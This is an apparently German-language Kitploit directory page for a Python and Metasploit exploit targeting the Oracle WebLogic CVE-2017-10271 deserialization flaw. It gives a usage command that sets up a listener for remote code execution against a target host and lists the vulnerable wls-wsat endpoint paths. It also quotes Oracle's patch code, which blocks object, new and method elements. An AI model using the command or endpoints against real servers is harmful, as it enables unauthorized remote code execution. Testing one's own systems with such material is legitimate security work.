Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-10271 — Python- und Metasploit-Exploit für die Oracle-WebLogic-WLS-WSAT-Deserialisierungsschwachstelle (CVE-2017-10271) mit Funktionen zum Erkennungs-Scanning und zur Remote-Codeausführung. | Kitploit
Tools/GitHubGitHub/kkirsche/cve-2017-10271
Exploit-FrameworksPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubkkirsche/cve-2017-10271

CVE-2017-10271

Python- und Metasploit-Exploit für die Oracle-WebLogic-WLS-WSAT-Deserialisierungsschwachstelle (CVE-2017-10271) mit Funktionen zum Erkennungs-Scanning und zur Remote-Codeausführung.

Repository anzeigen
129422vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2017-10271

Weblogic wls-wsat Komponenten-Deserialisierungs-Schwachstelle (CVE-2017-10271) Erkennungs- und Exploit-Skript

Verwendung

root@kitploit:~
$ python CVE-2017-10271.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/

Funktionen

  • Eigenständiges Python-Skript
    • Überprüfungsfunktion, um zu sehen, ob ein Host verwundbar ist
    • Exploit-Funktion für Linux-Ziele
  • Metasploit-Modul
    • Überprüfungsfunktion, um zu sehen, ob ein Host verwundbar ist
    • Exploit-Funktion für alle Ziele
  • Scanner (./scanners)
    • Überprüft, ob Hosts verwundbar sind. Vollständig eigenständig

Rechtliche Hinweise

Sie sind für die Nutzung dieses Skripts verantwortlich. Kevin Kirsche übernimmt keine Verantwortung für Handlungen, die mit dem hier bereitgestellten Code durchgeführt werden. Der Code wurde für Teams erstellt, die die Sicherheit ihrer Server überprüfen möchten, nicht für böswillige Nutzung.

Danksagung

Großer Dank an Luffin für die Erstellung des ursprünglichen POC, auf dem dies basiert: https://github.com/Luffin/CVE-2017-10271

Verwundbare URLs (außer der gezeigten):

root@kitploit:~
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11

Verwandte Schwachstelle

CVE 2017-3506

Oracle's Patch

Original Source: https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

Updated Source: https://nsfocusglobal.com/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

root@kitploit:~
private void validate(InputStream is) {
 WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();
 
 try {
  SAXParser parser = factory.newSAXParser();
  
  parser.parse(is, new DefaultHandler()) {
   private int overallarraylength = 0;
   
   public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXEception {
    if (qName.equalsIgnoreCase("object")) {
     throw new IllegalStateException("Invalid element qName:object");
    } else if (qName.equalsIgnoreCase("new")) {
     throw new IllegalStateException("Invalid element qName:new");
    } else if (qName.equalsIgnoreCase("method")) {
     throw new IllegalStateException("Invalid element qName:method");
    } else {
     if (qName.equalsIgnoreCase("void")) {
      for(int attClass = 0;attClass < attributes.getLength(); ++attClass) {
       if (!"index".equalsIgnoreCase(attributes.getQName(attClass))) {
        throw new IllegalStateException("Invalid attribute for element void: " + attributes.getQName(attClass));
       }
      }
     }
     
     ... more code here ...
    }
   }
  }
 }
}
Tool herunterladen